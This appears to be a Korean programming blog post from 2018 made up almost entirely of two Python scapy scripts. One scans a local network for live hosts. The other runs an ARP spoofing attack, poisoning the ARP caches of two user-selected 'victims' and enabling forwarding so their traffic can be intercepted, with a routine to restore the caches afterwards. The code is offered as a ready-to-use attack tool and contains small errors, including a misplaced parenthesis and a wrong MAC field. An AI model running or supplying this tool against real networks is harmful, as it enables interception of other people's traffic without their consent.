ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • ARP Spoofing
    Programming/Python 2018. 6. 28. 00:32

    <scan.py>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    from scapy.all import *
    import threading
    import os
     
    host_list = {}
    num = 0
    threadLock = threading.Lock()
    threads = []
     
    def printHosts(host_list):
        print('-------------------------- HOST LIST --------------------------')
        print('NUM         IP                               MAC')
        print('---------------------------------------------------------------')
        for num in host_list:
            ip, mac = host_list[num]
            print("%d           %s                      %s" % (num, ip, mac))
        print('---------------------------------------------------------------')
     
    def sendARP(ip):
        global host_list, num
        ans, unans = srp(Ether(dst='ff:ff:ff:ff:ff:ff'/ ARP(pdst=ip), timeout=5, retry=1)
        for s, r in ans:
            threadLock.acquire()
            num = num + 1
            host_list.update({num: (ip, r.sprintf('%Ether.src%'))})
            threadLock.release()
     
    def scanHosts():
        for i in range(1256):
            ip = "192.168.0.%d" % i
            th = threading.Thread(target=sendARP, args=(ip,))
            th.start()
            threads.append(th)
     
        for t in threads:
            t.join()
     
        os.system('clear')
        printHosts(host_list)
        return host_list
    cs


    <arp_spoofing.py>

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    from scan import *
    from scapy.all import *
    import os
     
    def arpSpoof(vic1_ip, vic1_mac, vic2_ip, vic2_mac):
        arp1=ARP(op=2, psrc=vic1_ip, pdst=vic2_ip, hwdst=vic2_mac)
        arp2=ARP(op=2, psrc=vic2_ip, pdst=vic1_ip, hwdst=vic2_mac)
        send(arp1)
        send(arp2)
     
    def restoreARP(vic1_ip, vic1_mac, vic2_ip, vic2_mac):
        arp1=ARP(op=2, psrc=vic1_ip, hwsrc=vic1_mac, pdst=vic2_ip, hwdst='ff:ff:ff:ff:ff:ff')
        arp2=ARP(op=2, psrc=vic2_ip, hwsrc=vic2_mac, pdst=vic1_ip, hwdst='ff:ff:ff:ff:ff:ff')
        send(arp1, count=3)
        send(arp2, count=3)
     
    def main():
        host_list=scanHosts()
        victim1=input("Victim 1 : ")
        victim2=input("Victim 2 : ")
     
        print("ARP Spoofing START")
     
        os.system("fragrouter -B1")
        try:
            while True:
                arpSpoof(host_list[int(victim1)][0], host_list[int(victim1)][1], host_list[int(victim2)][0], host_list[int(victim2)][1])
        except KeyboardInterrupt:
            restoreARP(host_list[int(victim1)][0], host_list[int(victim1)][1], host_list[int(victim2)][0], host_list[int(victim2)][1])
            print("ARP Spoofing END")
     
    if __name__=='__main__':
        main()
     
    cs


    'Programming > Python' 카테고리의 다른 글

    cookie를 이용한 로그인  (0) 2018.07.18
    ARP Spoofing  (0) 2018.06.28
    ARP를 이용한 host scan  (0) 2018.06.25
    scapy 사용법  (0) 2018.06.20
    살아있는 호스트 IP 스캔하기  (0) 2018.02.13
    Dictionary Attack  (0) 2018.01.31

    댓글 0

~ ^ . ^ ~